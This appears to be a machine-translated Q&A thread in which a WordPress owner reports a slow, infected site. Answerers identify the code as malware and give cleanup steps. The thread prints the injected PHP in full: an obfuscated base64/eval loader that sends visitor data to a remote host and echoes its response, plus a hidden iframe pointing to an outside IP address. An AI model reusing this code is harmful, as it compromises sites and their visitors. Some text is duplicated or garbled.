我的wordpress网站中有奇怪的代码,我的网站运行速度太慢
我有一个wordpress网站,最近我看到加载索引页面太慢了。两周来,我一直在努力寻找问题,但什么也没找到。最后一天,我备份了所有文件并删除了我网站上的所有内容,当我用记事本++打开我的网站索引页时 我看到了太多奇怪的代码,当我在wamp上本地运行我的站点时,我的防病毒程序发出了太多的警告并阻止了很多外部连接。 我在我的网站索引页上看到了以下代码:我的wordpress网站中有奇怪的代码,我的网站运行速度太慢,wordpress,Wordpress,我有一个wordpress网站,最近我看到加载索引页面太慢了。两周来,我一直在努力寻找问题,但什么也没找到。最后一天,我备份了所有文件并删除了我网站上的所有内容,当我用记事本++打开我的网站索引页时 我看到了太多奇怪的代码,当我在wamp上本地运行我的站点时,我的防病毒程序发出了太多的警告并阻止了很多外部连接。 我在我的网站索引页上看到了以下代码: <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
该字符串解码为:
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>
$\u X解码为:
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>
?>
然后,通过将123456aoui
中的所有字符替换为aouie123456
中的字符,进一步处理$X
不好。这是一个恶意软件。您应该执行以下操作(非常快):
- 删除所有FTP帐户,使用不同的名称和密码创建新帐户
- 更改与服务器相关的所有可能的密码
- 下载所有服务器文件并使用一些编辑器在本地目录中搜索
和eval(base64_decode)(
。删除它们iframe
- 联系您的ISP,他们应该在您的服务器上运行测试,以确认一切都是干净的
- 清理您的计算机并设置更好的防病毒保护,因为这是它的起点
- 检查您的域的“坏站点”列表,在您清理完所有内容后,向它们发送重新评估您的域的请求
<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>
及
通常在?>
之后添加eval部分,通常在索引
文件中添加,但可能在任何地方添加。它用于pagerank诈骗
如果你想了解更多信息,请点击这里:简短的回答是你的网站被黑客攻击了。你应该在这里询问:@John为什么要问wordpress?这不是wordpress唯一的问题,如果有什么问题的话,应该在@Kalle中,我想,因为清理它将是wordpress特有的。不管怎样,这都不是一个编程pr问题。